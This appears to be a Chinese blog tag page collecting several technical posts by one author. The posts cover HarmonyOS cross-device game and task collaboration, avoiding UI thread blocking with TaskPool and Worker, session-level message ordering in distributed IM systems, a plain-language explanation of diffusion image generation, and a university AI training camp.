包含关键字 typecho 的文章

一部手机不够玩？鸿蒙如何把多设备变成一个游戏系统（实战解析）

作者: 纯情
时间: 2026-01-20
分类: 开源
评论

在这里插入图片描述

摘要

这两年，跨屏协作在鸿蒙生态里出现得越来越频繁。
从最早的文件互传、多屏办公，到现在的教育课堂、车机联动，设备之间已经不再是“各干各的”。

在游戏领域，这个变化更明显：

一块屏幕已经不够玩
玩家希望多设备一起参与
大屏负责画面，小屏负责操作

但很多开发者一提“跨屏游戏”，第一反应还是投屏、远程控制、镜像显示。
实际上，鸿蒙给的不是投屏方案，而是一整套分布式游戏协作能力。

这篇文章就从游戏开发者的真实视角，讲清楚鸿蒙是如何把多设备变成“一个游戏系统”的。

引言

在传统系统里，如果你想做多设备协作游戏，通常意味着：

自己写网络协议
自己做设备发现
自己处理数据一致性
自己兜底各种异常情况

而在 HarmonyOS 里，这些事情被系统层直接兜住了：

设备发现靠软总线
状态同步靠分布式数据
UI 跨屏靠 Ability 调度

你要做的事情更偏向游戏逻辑设计本身，而不是重复造轮子。

接下来我们一步一步拆。

什么是鸿蒙里的跨屏游戏协作

跨屏不是投屏

先说一个很重要的点：

鸿蒙的跨屏游戏 ≠ 投屏

投屏的特点是：

一端渲染
另一端只是显示
没有真正的协作逻辑

而鸿蒙的跨屏游戏，更像是：

多设备同时运行
各自承担不同功能
通过系统级分布式能力协同

比如：

手机只负责操作和技能
平板或智慧屏负责主战场渲染
游戏状态在多设备之间自动同步

一个最常见的跨屏游戏形态

手机（控制器）
  │
  │ 操作指令
  ▼
平板 / 智慧屏（主画面）
  │
  │ 游戏状态同步
  ▼
分布式数据中心

支撑跨屏游戏的三大核心能力

分布式软总线：设备能“找到彼此”

在游戏里，你最关心的不是网络协议，而是：

能不能快速发现附近设备
延迟够不够低
掉线能不能感知

鸿蒙的分布式软总线解决的正是这些问题。

你不需要关心设备是：

Wi-Fi
蓝牙
局域网
点对点

系统会自动选最优链路。

分布式数据管理：状态天然同步

跨屏游戏最怕的几个问题：

状态不一致
数据打架
玩家看到的画面不同步

鸿蒙提供的分布式 KV 数据，天生适合游戏里的：

玩家位置
血量
技能状态
回合阶段

而且是系统级同步，不是你自己发包。

分布式 UI：屏幕不是绑死的

在鸿蒙里：

Ability 可以被拉起到其他设备
游戏不用重新启动
状态不需要你手动迁移

这对游戏来说很重要，因为你可以自由设计：

哪个屏幕显示什么
玩家如何参与
随时切换设备角色

跨屏游戏的整体架构设计

一个可落地的结构示例

┌────────────┐
│ 手机端     │
│ 操作输入   │
│ 技能按钮   │
└─────┬──────┘
      │
      │ 分布式 KV 数据
      ▼
┌────────────┐
│ 平板端     │
│ 游戏主画面 │
│ 渲染逻辑   │
└────────────┘

手机不负责画面，平板不负责输入，各司其职。

实战核心：跨屏游戏状态同步 Demo

创建分布式 KV Store

import distributedData from '@ohos.data.distributedData';

const kvManager = distributedData.createKVManager({
  bundleName: 'com.example.crossgame',
  context: getContext()
});

const store = await kvManager.getKVStore('gameStore', {
  kvStoreType: distributedData.KVStoreType.SINGLE_VERSION,
  securityLevel: distributedData.SecurityLevel.S1
});

这个 store 在多设备之间是共享的。

手机端发送操作指令

// 模拟摇杆方向
async function sendMove(x: number, y: number) {
  await store.put('player_move', JSON.stringify({
    x,
    y,
    time: Date.now()
  }));
}

这里同步的是“操作”，而不是最终坐标。

平板端监听并更新角色

store.on('dataChange', (data) => {
  data.insertedEntries.forEach(entry => {
    if (entry.key === 'player_move') {
      const move = JSON.parse(entry.value as string);
      updatePlayer(move.x, move.y);
    }
  });
});

跨屏 UI：把主画面拉到大屏

从手机拉起平板的游戏界面

import featureAbility from '@ohos.ability.featureAbility';

featureAbility.startAbility({
  want: {
    bundleName: 'com.example.crossgame',
    abilityName: 'GameMainAbility',
    deviceId: 'remoteDeviceId'
  }
});

前提是：

游戏状态已经存在分布式数据中
新设备启动后直接读取即可

为什么这个能力对游戏很重要

你不需要：

手动传进度
重新初始化状态
处理复杂的恢复逻辑

系统已经帮你兜底。

真实应用场景拆解

场景一：手机当手柄，大屏玩游戏

适合类型

派对游戏
本地多人
家庭娱乐

逻辑示例

// 手机端：技能释放
await store.put('skill_cast', {
  skillId: 2,
  playerId: 'p1'
});

// 大屏端：技能响应
store.on('dataChange', (data) => {
  data.insertedEntries.forEach(e => {
    if (e.key === 'skill_cast') {
      castSkill(e.value);
    }
  });
});

场景二：非对称协作游戏

比如：

一个人当指挥
一个人实际操作

// 指挥端下达命令
await store.put('command', {
  type: 'attack',
  target: 'boss'
});

操作端只负责执行，不做决策。

场景三：教育 + 游戏化互动

老师平板控制节奏，学生手机参与。

// 教师端切换关卡
await store.put('game_stage', 'level_2');

学生端监听并同步切换界面。

常见问题 QA

Q1：分布式 KV 会不会太慢？

不会。
它适合的是：

低频状态
操作指令
游戏阶段

高频帧同步需要更底层方案。

Q2：能不能用在竞技类游戏？

可以，但不建议直接用 KV 同步帧数据。
更适合：

操作同步
客户端预测
状态校正

Q3：设备掉线怎么办？

KV 会自动触发变更事件，你可以监听：

玩家退出
状态回收
AI 接管

总结

从游戏开发角度看，鸿蒙的跨屏协作并不是噱头，而是一套真正能落地的系统能力。

核心就一句话：

多设备在鸿蒙里，不是多个客户端，而是一个分布式游戏系统。

软总线解决连接
分布式数据解决同步
Ability 解决跨屏 UI
ArkTS 足够把 Demo 跑起来

摘要

随着智能终端越来越多，应用早就不再只运行在一台设备上。手机、平板、智慧屏、手表之间的协作，已经成了很常见的需求。在这种背景下，多设备任务该怎么分、分到哪台设备执行，就成了开发中绕不开的问题。

在鸿蒙系统中，这个问题并不是靠开发者“手动指定设备”来解决的，而是通过 设备能力感知 + 分布式调度机制 来完成。开发者更多关心的是：
这个任务适合干什么，而不是非要在哪台设备干。

本文会结合鸿蒙系统的分布式能力，介绍多设备任务分配的整体思路，并通过可运行的 Demo 代码，把这个过程完整跑一遍，最后再结合几个真实场景，聊聊它在实际项目中该怎么用。

引言

如果放在以前，一个应用基本只跑在一台手机上，最多考虑前后台切换。但现在不一样了：

手机在你手里
平板在桌子上
智慧屏在客厅
手表戴在手上

用户希望的是：
设备不同，但体验是连着的。

鸿蒙系统的分布式能力，正是为这种场景设计的。它不是简单的“跨设备通信”，而是把 任务、数据、能力 都变成可以在多设备之间流动的资源。

而多设备任务分配，本质上就是一句话：

把合适的任务，交给合适的设备去做。

鸿蒙多设备任务分配的整体思路

先发现设备，再谈分配

在鸿蒙系统中，只要设备在同一个分布式网络里，系统就能自动发现它们。
开发者不需要自己维护“设备表”，也不用关心设备什么时候上线、下线。

系统会帮你感知这些信息：

设备类型（手机、平板、智慧屏）
基本性能情况
是否可信
当前是否可用

你只需要在合适的时机拿到设备列表即可。

任务一定要能拆

多设备任务分配的前提是：
你的业务本身是能拆开的。

比如：

页面展示是一块
数据采集是一块
计算处理是一块

如果一个任务从头到尾全写死在一个 Ability 里，那基本就没法分配了。

系统负责“怎么选设备”

在鸿蒙里，真正“选哪台设备执行”的逻辑，大部分是系统完成的：

当前设备忙不忙
网络情况好不好
设备能力是否匹配
是否更适合本地执行

开发者更多是通过 Ability 启动方式、Service 类型、数据同步方式 来间接影响分配结果。

核心实现方式一：跨设备启动 Ability

适合什么场景

这种方式最常见，适合：

页面展示
功能模块整体迁移
用户可感知的交互任务

比如：
手机负责控制，平板负责显示大屏内容。

Demo：在平板上启动远程 Ability

import distributedDeviceManager from '@ohos.distributedDeviceManager';
import featureAbility from '@ohos.ability.featureAbility';

const BUNDLE_NAME = 'com.example.distributeddemo';

let deviceManager = distributedDeviceManager.createDeviceManager(BUNDLE_NAME);

function startRemotePage() {
  let devices = deviceManager.getTrustedDeviceListSync();

  devices.forEach(device => {
    if (device.deviceType === 2) { // 假设 2 表示平板
      let want = {
        bundleName: BUNDLE_NAME,
        abilityName: 'RemotePageAbility',
        deviceId: device.deviceId
      };
      featureAbility.startAbility(want);
    }
  });
}

代码说明

createDeviceManager：创建设备管理器
getTrustedDeviceListSync：获取可信设备列表
deviceType：用于简单区分设备类型
startAbility：指定 deviceId 后，Ability 会在远端设备启动

整个过程不需要你关心远端设备的进程、生命周期，系统会处理。

核心实现方式二：分布式 Service 执行任务

适合什么场景

这种方式更适合：

计算密集型任务
后台处理
不需要 UI 的逻辑

比如：
手机采集数据，交给性能更强的设备做分析。

Demo：连接远端计算 Service

import featureAbility from '@ohos.ability.featureAbility';

function connectRemoteService(remoteDeviceId: string) {
  let want = {
    bundleName: 'com.example.distributeddemo',
    abilityName: 'ComputeServiceAbility',
    deviceId: remoteDeviceId
  };

  featureAbility.connectAbility(want, {
    onConnect(elementName, remote) {
      console.log('远程 Service 已连接');
      remote.sendMessage({
        command: 'startCompute',
        data: [1, 2, 3, 4]
      });
    },
    onDisconnect() {
      console.log('远程 Service 已断开');
    }
  });
}

代码说明

Service 在远端设备运行
本地通过 IPC 的方式和远端通信
计算逻辑完全在远端执行
本地只负责发请求、收结果

这种方式非常适合“重计算、轻交互”的任务。

典型应用场景分析与示例

场景一：手机 + 平板的学习展示系统

场景说明

手机负责控制、翻页
平板负责展示课件内容

实现思路

手机发现平板
在平板启动展示 Ability
通过分布式数据同步当前页码

import distributedData from '@ohos.data.distributedData';

async function syncPage(page: number) {
  let kvManager = distributedData.createKVManager();
  let store = await kvManager.getKVStore('pageStore');
  await store.put('current_page', page);
}

平板端监听数据变化，自动刷新页面。

场景二：多设备健康数据分析

场景说明

手表采集心率
手机做基础处理
平板做数据可视化

实现思路

手表同步原始数据
手机过滤、预处理
平板负责展示图表

核心在于：
任务不是“复制”，而是“分工”。

场景三：家庭智慧屏协同控制

场景说明

手机是遥控器
智慧屏负责 UI 展示
计算逻辑放在智慧屏

实现思路

手机只负责发指令
智慧屏 Service 处理业务逻辑
结果同步回手机

这种模式下，手机压力很小，体验反而更流畅。

常见问题 QA

Q1：我能不能指定“一定要某台设备执行”？

不推荐。
鸿蒙的设计思想是 声明需求，而不是指定设备。
你可以通过能力需求去“引导”，但不建议写死。

Q2：设备突然下线怎么办？

系统会通知连接断开，
你需要做的只有一件事：
支持本地降级执行或重试。

Q3：分布式任务一定比本地慢吗？

不一定。
当任务本身就不适合本地执行时，
分布式反而更快、更省电。

总结

在鸿蒙系统中，多设备任务分配并不是一套复杂、难以理解的机制，它的核心思想其实很简单：

把任务拆清楚
描述好任务需求
把调度交给系统

只要你在设计阶段考虑好“哪些任务适合分出去”，鸿蒙的分布式能力就能自然地帮你把事情做好。

一句话总结就是：

多设备任务分配，不是设备协作有多复杂，而是你有没有把任务设计清楚。

HarmonyOS 中如何避免线程阻塞？从原理到实战的完整解析

作者: 纯情
时间: 2026-01-20
分类: 开源
评论

在这里插入图片描述

摘要

随着 HarmonyOS / OpenHarmony 在手机、平板、智慧屏、车机等多设备上的落地，应用的复杂度正在明显提升。页面不再只是简单展示，而是伴随着网络请求、数据计算、设备协同等大量逻辑。如果这些逻辑处理不当，很容易出现页面卡顿、点击无响应，甚至 Ability 被系统回收的问题。

线程阻塞，已经成为鸿蒙应用开发中最容易踩坑、也最影响体验的问题之一。本文将结合实际开发场景，用尽量口语化的方式，聊一聊在鸿蒙系统中如何系统性地避免线程阻塞，并给出可以直接运行的 Demo 代码。

引言

在早期的应用开发中，很多开发者习惯把逻辑直接写在点击事件里，或者在页面加载时同步读取数据。这种写法在简单页面中问题不大，但在 HarmonyOS 这种强调流畅体验和多设备协同的系统中，很容易暴露问题。

鸿蒙的 UI 是声明式的，系统对主线程（UI 线程）非常敏感。一旦主线程被占用，页面掉帧、动画卡住、操作延迟都会立刻出现。因此，理解哪些操作会阻塞线程，以及如何把这些操作合理地“挪走”，是每个鸿蒙开发者绕不开的一课。

下面我们从原理、工具、代码和真实场景几个角度，完整地拆解这个问题。

为什么线程阻塞在鸿蒙中这么致命

UI 线程到底在忙什么

在 HarmonyOS 中，UI 线程主要负责三件事：

ArkUI 页面渲染
用户事件分发（点击、滑动等）
Ability 生命周期回调

简单理解就是：只要和“看得见、点得动”有关的事情，几乎都在 UI 线程上完成。

一旦你在这里做了耗时操作，比如计算、IO、网络等待，页面就会立刻表现出“卡”的感觉。

常见的阻塞来源

在实际项目中，最容易导致阻塞的操作通常包括：

同步网络请求
文件读写
数据库查询
大量 for 循环计算
人为 sleep 或死循环

这些操作本身不一定是错的，问题在于它们被放在了不该放的线程上。

鸿蒙中避免线程阻塞的核心思路

一个总原则

可以把鸿蒙里的线程使用总结成一句话：

UI 线程只处理 UI，其他事情交给异步、线程池或 Worker。

围绕这个原则，系统也提供了多种工具，帮助开发者把任务“分流”。

异步编程是第一道防线

使用 async / await 处理耗时逻辑

在 ArkTS 中，官方推荐优先使用 Promise 和 async / await。它的好处是代码结构清晰，而且不会阻塞 UI 线程。

示例：页面加载网络数据

@Entry
@Component
struct AsyncDemo {
  @State message: string = '加载中...'

  build() {
    Column() {
      Text(this.message)
        .fontSize(20)
        .margin(20)

      Button('重新加载')
        .onClick(() => {
          this.loadData()
        })
    }
  }

  async loadData() {
    this.message = '请求中...'
    let response = await fetch('https://example.com/data')
    let result = await response.text()
    this.message = result
  }
}

代码说明

loadData 使用 async 声明，不会阻塞 UI
await 只是暂停当前函数执行，不会卡住页面
UI 更新完全由状态变化驱动

这是最基础、也是最常用的一种防阻塞方式。

TaskPool：处理计算和 IO 的利器

什么时候该用 TaskPool

当你遇到下面这些情况时，TaskPool 几乎是必选项：

大量计算
批量数据处理
文件压缩、解析

可运行 Demo 示例

import taskpool from '@ohos.taskpool'

@Concurrent
function calculateSum(count: number): number {
  let sum = 0
  for (let i = 0; i < count; i++) {
    sum += i
  }
  return sum
}

@Entry
@Component
struct TaskPoolDemo {
  @State result: string = '等待计算'

  build() {
    Column() {
      Text(this.result)
        .fontSize(18)
        .margin(20)

      Button('开始计算')
        .onClick(() => {
          this.startTask()
        })
    }
  }

  startTask() {
    this.result = '计算中...'
    taskpool.execute(calculateSum, 1000000).then(res => {
      this.result = `结果是：${res}`
    })
  }
}

代码说明

@Concurrent 表示该函数可以并发执行
TaskPool 自动管理线程，不需要开发者手动创建线程
UI 线程只负责接收结果和更新状态

在真实项目中，使用 TaskPool 往往能立刻解决页面卡顿问题。

Worker：长期后台任务的选择

Worker 的使用场景

如果任务具有下面这些特点，就更适合使用 Worker：

长时间运行
需要持续处理数据
与 UI 强隔离

比如日志分析、音视频处理、复杂解析等。

示例：使用 Worker 处理数据

主线程代码

let worker = new Worker('workers/data_worker.ts')

worker.postMessage({ action: 'start' })

worker.onmessage = (e) => {
  console.log('收到结果：', e.data)
}

Worker 线程代码

onmessage = function (e) {
  if (e.data.action === 'start') {
    let result = 0
    for (let i = 0; i < 500000; i++) {
      result += i
    }
    postMessage(result)
  }
}

代码说明

Worker 与 UI 线程完全独立
即使计算时间较长，也不会影响页面交互
通过消息机制进行通信

结合实际场景的应用示例

场景一：列表页面加载大量数据

问题：

首次进入页面时一次性处理全部数据
页面明显卡顿

解决思路：

网络请求使用 async
数据整理放入 TaskPool

async loadList() {
  let data = await fetchData()
  taskpool.execute(processData, data).then(list => {
    this.list = list
  })
}

场景二：文件导入与解析

问题：

文件较大
解析过程耗时

解决思路：

Worker 负责解析
UI 只显示进度

worker.postMessage({ filePath })

场景三：复杂计算驱动 UI 更新

问题：

计算逻辑和 UI 耦合

解决思路：

计算完全放到 TaskPool
UI 只订阅结果

QA 环节

Q：async / await 会不会阻塞线程？
A：不会，它只是让出执行权，不会卡住 UI 线程。

Q：TaskPool 和 Worker 怎么选？
A：短期、一次性的任务优先 TaskPool，长期或持续任务用 Worker。

Q：能不能在生命周期里做耗时操作？
A：不建议，生命周期函数应尽量轻量。

总结

线程阻塞并不是某一个 API 的问题，而是设计问题。在 HarmonyOS 中，系统已经为我们准备好了异步模型、TaskPool 和 Worker，只要遵循“UI 线程只做 UI”的原则，大多数卡顿问题都可以提前避免。

在真实项目中，提前做好任务拆分、线程规划，比后期排查卡顿要省心得多。这也是鸿蒙开发从“能跑”到“跑得顺”的一个重要分水岭。

如何保障分布式IM聊天系统的消息有序性（即消息不乱）

作者: 纯情
时间: 2026-01-20
分类: 开源
评论

本文引用了45岁老架构师尼恩的技术分享，有修订和重新排版。

1、引言

分布式IM聊天系统中，IM消息怎么做到不丢、不重、还按顺序到达？这个问题，涉及到IM系统的两个核心：1）消息不能丢（可靠性）：比如用户点了发送，不能因为服务宕机或网络抖动，消息石沉大海。比如地铁隧道、电梯间，网络断了又连，消息不能卡住不动（要确保弱网也能用）。2）顺序不能乱（有序性）：比如“在吗？” 回成 “吗在？”，群聊时间线错乱，体验直接崩盘。这二大痛点，是IM聊天系统架构的命门所在。下面是一张IM消息从发出到接收的关键路径：

2、系列文章

为了更好以进行内容呈现，本文拆分两了上下两篇。本文是2篇文章中的第 1 篇：《如何保障分布式IM聊天系统的消息有序性（即消息不乱）》（☜ 本文）《如何保障分布式IM聊天系统的消息可靠性（即消息不丢）》（稍后发布..）本篇主要总结和分享分布式IM聊天系统架构中关于消息有序性的设计和实践。

3、传统技术方案的瓶颈，怎么破？

早期做消息有序，很多人第一反应是搞个“全局发号器”——所有消息排一队，挨个编号再发。理想很丰满，现实很骨感：高并发下一拥而上抢号，发号器直接被打满；更致命的是，它一旦宕机，全链路雪崩。这就像春运火车站只开一个售票窗——再快也撑不过三分钟。所以，我们必须换思路：不搞大一统，而是分片独立发号，让每个“窗口”自给自足，互不干扰。

4、痛点拆解：为什么消息会乱？

我们先还原一个真实场景：想象一下你和朋友聊天：你说：“1 吃饭了吗？”他回：“2 刚吃完。”你又说：“3 吃啥呢？”结果对方手机上显示成：“3 吃啥呢？” → “1 吃饭了吗？” → “2 刚吃完。”这不是 bug，是分布式系统的常态。三条消息走不同服务节点、经不同网络路径，到达时间完全不可控，最终呈现顺序错乱。会乱问题本质是什么？一个要“串行等”，一个想“并发冲”，天然冲突。这时候有人会说：那我加个全局排序服务不就行了？可以，但代价太大——一个中心节点最多撑几万 QPS，面对百万群聊、亿级用户，还没上线就已过载。所以，全局有序不是解，而是枷锁。我们要的不是“天下大同”，而是“各聊各的别乱就行”。

5、最终方案：分而治之 + 局部有序

真正的突破口在于：我们根本不需要全局有序，只需要“会话内有序”。你和张三的聊天记录不能乱，但你和李四的聊天跟王五的完全无关——何必放一起排序？这就引出了经典策略：分而治之 + 局部有序。具体怎么做？两步走稳：第一步 - 业务分区：哈希分片，锁定归属用 sessionId 做一致性哈希，确保同一个会话的所有消息始终路由到同一个处理节点。按“会话ID”做哈希，算出该消息该由哪个节点处理。同一会话 → 哈希值一样 → 路由到同一台机器 → 所有消息串行处理，天然避免跨节点乱序。这样一来，单个会话内的消息在服务端就是串行处理的，天然不会乱。第二步 - 局部序号：独立发号，局部递增每个会话独立维护一个计数器，每来一条消息就+1，作为它的“官方序号”。每个会话,可以配一个独立计数器（比如 Redis 的 INCR），每来一条消息就+1，生成唯一 SEQ。客户端不管什么时候收到消息，只认这个序号，按序号从小到大排列展示。这个 SEQ 就是这条消息的“官方身份证号”，客户端只认这个，不看接收时间。这就像电影院检票——你可以早到晚到，但座位按票号定。哪怕后排观众先进场，也不会坐到前排去。PS：IM消息ID生成相关的文章可详细阅读以下资料：《IM消息ID技术专题(一)：微信的海量IM聊天消息序列号生成实践（算法原理篇）》《IM消息ID技术专题(二)：微信的海量IM聊天消息序列号生成实践（容灾方案篇）》《IM消息ID技术专题(三)：解密融云IM产品的聊天消息ID生成策略》《IM消息ID技术专题(四)：深度解密美团的分布式ID生成算法》《IM消息ID技术专题(五)：开源分布式ID生成器UidGenerator的技术实现》《IM消息ID技术专题(六)：深度解密滴滴的高性能ID生成器(Tinyid)》《IM消息ID技术专题(七)：深度解密vivo的自研分布式ID服务(鲁班)》

6、实践落地（核心片段伪代码）

1）服务端分片路由逻辑：来看关键实现：如何把消息精准投递给“对的人”。String sessionId = msg.getSessionId();//这里是伪代码，实际代码以mq 的负载均衡机制为准int nodeIndex = Math.abs(sessionId.hashCode()) % clusterNodeCount; //这里写个伪代码，代表mq 主从复制ClusterNode targetNode = clusterNodes.get(nodeIndex);targetNode.sendMsg(msg);核心就一句：基于会话 ID 哈希取模，固定路由。从此，每个会话都有了自己的“专属服务通道”，不再受其他会话影响。2）服务端序号分配逻辑：接下来，给每条消息发“通行证”：long msgSeq = redis.incr("msg_seq_" + sessionId);msg.setSeq(msgSeq);msg.setUniqueKey(sessionId + "_" + msgSeq);这里用了 Redis 的 INCR，保证同一个会话下的 SEQ 绝对递增，且线程安全。同时用 sessionId_seq 作为唯一键，既能幂等去重，也能防止重试导致消息重复入库。实战提示：如果你的 Redis 是集群模式，记得确保同一个会话的 key 落在同一 slot，否则 INCR 可能跨节点失效。3）客户端排序逻辑：最后一步，客户端收尾：别急着渲染，先排好队。//这里是伪代码，先排序List<Msg> sortedMsgs = msgList.stream() .sorted(Comparator.comparingLong(Msg::getSeq)) .collect(Collectors.toList());//这里是伪代码，再渲染renderMsgList(sortedMsgs);无论消息以什么顺序到达，统统按 seq 升序排列后再上屏。哪怕第100条先到，第1条后到，也能正确归位。这也是为什么我们强调“客户端必须信任服务端 SEQ”——它是唯一真相源。

7、方案总结：放弃全局有序，换高可用与高性能

总结一下，这套方案的核心思想就一句话：不要为“假需求”买单——我们不需要全局有序，只需要业务上有意义的有序。你看微信、钉钉、飞书，哪一个是把全平台消息排成一条队列的？没有。它们都选择了“会话级隔离 + 局部有序”的设计，这才是工业级系统的通用解法。背后的分布式哲学也很清晰：

最终换来的是：1）高并发支持（水平扩展）；2）高可用（无单点）；3）强一致体验（用户无感知）。这正是中高级开发者必须掌握的权衡思维：不是技术做不到，而是要不要做。有时候，“不做全局有序”，反而是最正确的选择。

8、 IM消息有序性架构的核心流程总结

最后，一张图串起全流程：

从发起到渲染，全程围绕“会话隔离”和“局部发号”展开。每一个环节都在为同一个目标服务：在分布式环境下，低成本实现用户可感知的“顺序正确”。

—— 下篇《如何保障分布式IM聊天系统的消息可靠性（即消息不丢）》稍后发布，敬请期待 ——

9、参考资料

[1] 什么是IM聊天系统的可靠性？
[2] 什么是IM聊天系统的消息时序一致性？
[3] 微信技术分享：微信的海量IM聊天消息序列号生成实践（算法原理篇）
[4] 马蜂窝旅游网的IM系统架构演进之路
[5] 一套亿级用户的IM架构技术干货(下篇)：可靠性、有序性、弱网优化等
[6] 从新手到专家：如何设计一套亿级消息量的分布式IM系统
[7] 企业微信的IM架构设计揭秘：消息模型、万人群、已读回执、消息撤回等
[8] 融云技术分享：全面揭秘亿级IM消息的可靠投递机制
[9] 阿里IM技术分享(四)：闲鱼亿级IM消息系统的可靠投递优化实践
[10] 阿里IM技术分享(八)：深度解密钉钉即时消息服务DTIM的技术设计
[11] 基于实践：一套百万消息量小规模IM系统技术要点总结
[12] 一套分布式IM即时通讯系统的技术选型和架构设计
[13] 转转平台IM系统架构设计与实践(一)：整体架构设计
[14] 移动端弱网优化专题(一)：通俗易懂，理解移动网络的“弱”和“慢”
[15] 移动端弱网优化专题(二)：史上最全移动弱网络优化方法总结
[16] Web端即时通讯实践干货：如何让你的WebSocket断网重连更快速？
[17] 从客户端的角度来谈谈移动端IM的消息可靠性和送达机制
[18] IM消息送达保证机制实现(一)：保证在线实时消息的可靠投递
[19] 移动端IM中大规模群消息的推送如何保证效率、实时性？
[20] 如何保证IM实时消息的“时序性”与“一致性”？
[21] 一个低成本确保IM消息时序的方法探讨

即时通讯技术学习：

移动端IM开发入门文章：《新手入门一篇就够：从零开发移动端IM》
开源IM框架源码：https://github.com/JackJiang2011/MobileIMSDK（备用地址点此）

（本文已同步发布于：http://www.52im.net/thread-4887-1-1.html）

AI 如何根据文字生成图片？

作者: 纯情
时间: 2026-01-20
分类: 资讯
评论

在当今的数字时代，只需输入一句描述，如“一只穿着宇航服的猫在月球上喝咖啡，电影感光影”，几秒钟后，屏幕上便会呈现出一张惊艳的图像。Midjourney、Stable Diffusion 等 AI 绘画工具的出现，仿佛让“神笔马良”的故事成为了现实。

但这背后究竟是魔法，还是科技？

在那个神秘的进度条背后，AI 究竟在进行怎样的操作？它的“大脑”里是否真的住着一位不知疲倦的画手，拿着画笔在白纸上从零开始创作？

本文将抛开复杂的专业术语，以通俗易懂的方式拆解这一神奇过程。真相或许比想象中更有趣——AI 绘画，本质上是一场大型的“脑补”游戏。

第一部分：画布的真相——它居然不是空白的！

谈及绘画，人们的第一反应通常是：在一张干净的白纸上构图、打草稿、上色。

然而，AI 的创作方式截然不同。它的起点并非空白，而是一片混沌。

如果能深入 AI 的后台一探究竟，会发现当它准备开始工作时，面前的“画布”呈现出如下形态：

这是一张密密麻麻、杂乱无章的噪点图，在技术上被称为“纯噪声”。

在人类眼中，这或许只是毫无意义的混乱。但在 AI 眼中，这里隐藏着无限可能。AI 作画的本质，并非“无中生有”，而是“从混乱中建立秩序”。它不是在做加法（往白纸上添加内容），而是在做减法（去除不需要的噪点）。

第二部分：AI 的特殊技能——“脑补大师”是怎样炼成的？

面对这样一屏毫无头绪的雪花，AI 如何知道该从何处下手？这得益于它在投入使用前经历的魔鬼训练。

在尚未掌握绘画技能之前，AI 分析了数十亿张人类世界的图片。其学习方式颇为独特，堪称一位“破坏与重建狂魔”。

训练过程中，研究人员会向 AI 展示一张清晰的照片（例如一只小狗），随后逐步向照片中添加“沙子”（噪点），使照片逐渐变得模糊，直至完全变为一张无法辨认的雪花屏。

AI 的任务便是学习如何“倒放”这一过程——即凭经验将这张雪花屏还原成最初的那只小狗。

经过亿万次此类练习，AI 练就了一双“火眼金睛”，成为了世界上顶尖的“去噪专家”。面对任何混乱的图像，它的第一反应便是：“这太乱了，需要将其清理干净。”

第三部分：关键时刻——面对一片雪花，AI 怎么下第一笔？

这是整个生成过程中最为神奇的环节。

当用户输入指令：“画一只猫”，AI 面对着手中那张杂乱无章的雪花屏，内心或许是崩溃的：“这里哪里有猫？这全是噪点。”

此时，奇迹发生了。这个过程类似于人们童年时常玩的游戏——“在云朵里找形状”。

想象一下，躺在草地上注视着天上杂乱无章的云团发呆。此时，若有人提示：“嘿，你看那片云，像不像一只猫？”

一旦接受了这一设定，大脑便会开始强行“脑补”。越看越觉得：“左边那团突出的云确实有点像猫耳朵，中间那块暗影有点像猫身子……”

AI 画画的第一步，正是这种强制的“幻视”。

当用户输入“猫”作为提示词，便相当于给了 AI 一个强烈的暗示。它被迫在那堆毫无意义的噪点中寻找“猫”的蛛丝马迹。

它会审视那些随机排列的像素点，强行联想：“虽然目前很乱，但如果非要说的话，中间这几个黑点凑在一起，相较于角落里的白点，更有潜力发展成一个猫鼻子。”

于是，AI 迈出了极其微小的第一步：它并未直接画出猫鼻子，而只是将那些像素的颜色，朝着“猫”的方向轻轻推了一把。

第四部分：见证奇迹——从模糊到清晰的循环

这一步迈出后，画布看起来依然是一团糟。但 AI 绘画并非一步到位，它更像是一位手持橡皮擦和雕刻刀的雕塑家，一点一点将作品“磨”出来。

这个过程在软件中通常被称为“步数”（Steps）。

第 1 步： 对着雪花屏强行脑补，画面依然混沌，但已显现出极其微弱的趋势。
第 10 步： AI 认为“猫”的形象越来越确定，下手逐渐加重，画面中出现了一个模糊的影子，能隐约辨识出动物的轮廓。
第 20 步： 轮廓日益清晰，AI 开始雕琢细节：“此处应有毛发，彼处应是眼睛的反光。”
第 30 步： 大功告成！噪点被清理干净，光影、质感完美呈现，一只栩栩如生的猫诞生了。

这就是为什么 AI 生成图片需要几秒钟的时间，因为它在后台快速地进行了数十次“观察-脑补-修正”的循环。

第五部分：灵魂拷问——为什么每次生成的图片都不一样？

人们可能会发现，使用相同的提示词和模型设置，点击两次生成，AI 给出的图片却是完全不同的。既然是机器，为何结果不稳定？

这正是 AI 绘画的迷人之处，其原因主要有二：

1. 起跑线不同（蝴蝶效应）

还记得最初那张“雪花屏”吗？每次点击生成按钮，AI 面对的那张雪花屏都是电脑随机新生成的。

世界上没有两片相同的树叶，也没有两张相同的噪点图。

也许这一次，初始噪点的左上角偶然多出了几个黑点，AI 便觉得：“此处适合画一只黑猫”；下一次，中间的噪点偏黄一点，AI 便觉得：“这次画只橘猫更合理”。

初始状态的极其微小差别，经过数十步的放大，最终导致了结果的巨大不同。这就是 AI 世界的“蝴蝶效应”。

2. “猫”是一个范围，不是一个点

在 AI 的庞大数据库里，“猫”并非一张固定的标准证件照，而是一个巨大的概念库。

提示词只是将 AI 推向了“猫”的领地，但具体落在领地里的哪个位置——是波斯猫还是狸花猫，是躺姿还是坐姿——充满了随机性。除非使用非常精确的语言进行限制，否则 AI 很乐意在“猫”的领地里随机探索。

结语

综上所述，AI 绘画并没有自主意识，它其实并不懂什么是艺术，也不懂什么是猫。

它只是一个阅图无数、拥有超强计算能力的“去噪机器”，一个有着严重强迫症的“脑补大师”。

但正是这种纯粹的数学计算，加上一点点随机的运气，为人类带来了近乎无限的创造力。下次当再次按下生成按钮时，不妨想象一下 AI 在后台对着一堆雪花屏努力“脑补”的样子，这或许正是科技的可爱之处。

本文由mdnice多平台发布

AI赋能智汇高校 - 从零掌握大模型本地部署与微调全流程

作者: 纯情
时间: 2026-01-20
分类: 资讯
评论

前言：一场技术与激情的双向奔赴

当 2025 年秋季的第一片梧桐叶飘落在交大校园时，一场关于人工智能未来的探索正在悄然展开。这不仅是技术的传授，更是认知的革新——从被动使用AI工具到主动创造智能体，从理论认知到工程实践。上海交通大学“AI赋能智汇高校实训营”正是这样一座桥梁，连接着学术前沿与产业实践，也连接着青年学子与AI的未来。

实训营概况速览

时间: 2025年秋季学期
地点: 上海交通大学（闵行校区）
参与规模: 超过300名交大学子
核心目标: 从零掌握大模型本地部署与微调全流程
特色亮点: 国内首个全面基于NPU生态的大模型实训课程

能力提升三维度评估

同学们的“高光时刻”数据

参与度爆表
- 课程满意度评分：4.8/5.0
- 课后代码提交率：92%
- 平均每人完成3.2个微调实验
